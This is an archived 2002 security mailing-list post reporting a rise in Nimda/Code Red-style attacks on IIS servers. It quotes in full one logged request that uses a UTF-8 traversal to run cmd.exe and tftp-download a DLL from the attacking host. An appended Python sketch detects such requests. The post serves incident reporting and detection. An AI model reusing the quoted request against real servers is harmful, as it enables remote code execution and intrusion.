Security Incidents mailing list archives

Increase in Nimda/Code Red Variants - New Requests Made


From: Joshua_Hiller () aeanet org
Date: Tue, 26 Feb 2002 18:10:59 -0800

I am also seeing an upsurge in Nimda-like exploit requests.

This is just one example.

http://www.myserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2065.197180.98%20GET%20cool.dll%20c:\httpodbc.dll.

User's IP: 65.197.180.98

New DLLs are showing up in these requests, although the methods of
execution remain the same.  Perhaps someone has thrashed another core
IIS/Win32 dll and is attempting to exploit?  Pretty sure httpodbc.dll is in
use by IIS and my ODBC connections. (Correct me if I'm wrong ... ;))

Another thing I've noticed is the number of requests per IP has gone up.
Usually I'd get about 20 - 30 requests, now I'm receiving anywhere between
50 and 80 from the infected host.

It does still appear to be automated / worm activity.

Just thought I'd let the lists know. ;-)

Joshua Hiller
Manager Web Operations
AeA
Advancing the Business of Technology


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
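
An added example, not part of the original post: a log triage sketch that flags requests like the one quoted above by detecting overlong UTF-8 path separators (`%c1%9c` decodes to `\`), `cmd.exe` invocation and a tftp fetch of a DLL, then counts flagged requests per source IP. The function names, flag labels and sample log entries are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample (client IP, request URI) pairs; addresses are documentation ranges.
SAMPLE_LOG = [
    ("192.0.2.10", r"/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20cool.dll%20c:\httpodbc.dll"),
    ("192.0.2.10", "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir"),
    ("198.51.100.7", "/index.html"),
    ("198.51.100.7", "/caf%c3%a9.html"),  # valid UTF-8, must not be flagged
]

def decode_overlong(raw: bytes) -> list:
    """Return the ASCII characters hidden in 2-byte overlong UTF-8 sequences.

    Lead bytes 0xC0 and 0xC1 are never valid in UTF-8: they can only encode
    code points below 0x80, which must be written as a single byte."""
    hidden = []
    for lead, cont in zip(raw, raw[1:]):
        if lead in (0xC0, 0xC1) and 0x80 <= cont <= 0xBF:
            hidden.append(chr(((lead & 0x1F) << 6) | (cont & 0x3F)))
    return hidden

def classify(uri: str) -> set:
    """Label a request URI with the suspicious traits it shows."""
    raw = unquote_to_bytes(uri)
    text = raw.decode("latin-1").lower()
    flags = set()
    if any(c in "/\\" for c in decode_overlong(raw)):
        flags.add("overlong-path-separator")
    if "cmd.exe" in text:
        flags.add("cmd.exe")
    if re.search(r"tftp\b.*\bget\b.*\.dll", text):
        flags.add("tftp-dll-fetch")
    return flags

def summarize(log):
    """Map each source IP to (flagged request count, sorted flag labels)."""
    hits, kinds = Counter(), {}
    for ip, uri in log:
        flags = classify(uri)
        if flags:
            hits[ip] += 1
            kinds.setdefault(ip, set()).update(flags)
    return {ip: (n, sorted(kinds[ip])) for ip, n in hits.items()}

if __name__ == "__main__":
    for ip, (count, labels) in summarize(SAMPLE_LOG).items():
        print(ip, count, ", ".join(labels))
```

Tracking the per-IP count over time is what makes a rise such as the one reported above visible.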

